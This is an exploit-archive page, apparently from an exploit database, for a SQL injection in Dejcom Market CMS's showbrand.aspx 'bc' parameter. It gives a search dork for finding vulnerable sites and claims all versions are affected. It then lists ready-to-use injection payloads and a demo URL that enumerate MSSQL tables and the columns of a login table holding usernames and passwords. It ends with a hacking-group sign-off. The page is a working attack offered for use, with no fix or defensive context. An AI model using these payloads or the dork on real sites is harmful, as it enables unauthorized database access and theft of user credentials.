Dejcom Market CMS (showbrand.aspx) SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Dejcom Market CMS (showbrand.aspx) SQL Injection
# Published : 2010-12-04
# Author : Mormoroth
# Previous Title : phpKF Forum 1.80 profil_degistir.php CSRF Exploit
# Next Title : SQL injection vulnerability in do_trackbacks() Wordpress function

# Exploit Title: [Dejcom Market Cms SQL injection]
# Date: [01/12/2010]
# Author: [Mormoroth]
# Dork : "Powered By Dejcom Market CMS"
# Version: [ALL Version]
 Exploit:

 %27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge','COMMENTS','filegroup','files','groups','khabarname','khat','links','login'))--

showbrand.aspx?bc=%27 or 1=(select top 1 column_name from information_schema.columns where table_name='loguser' and column_name not in('code','username','pass'))--

Demo : http://server/showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in('bill','billdetail','cart','charge'))--
---------------------
Persian Gulf forever
ISCN TEAM
We are Mormoroth - Magicboy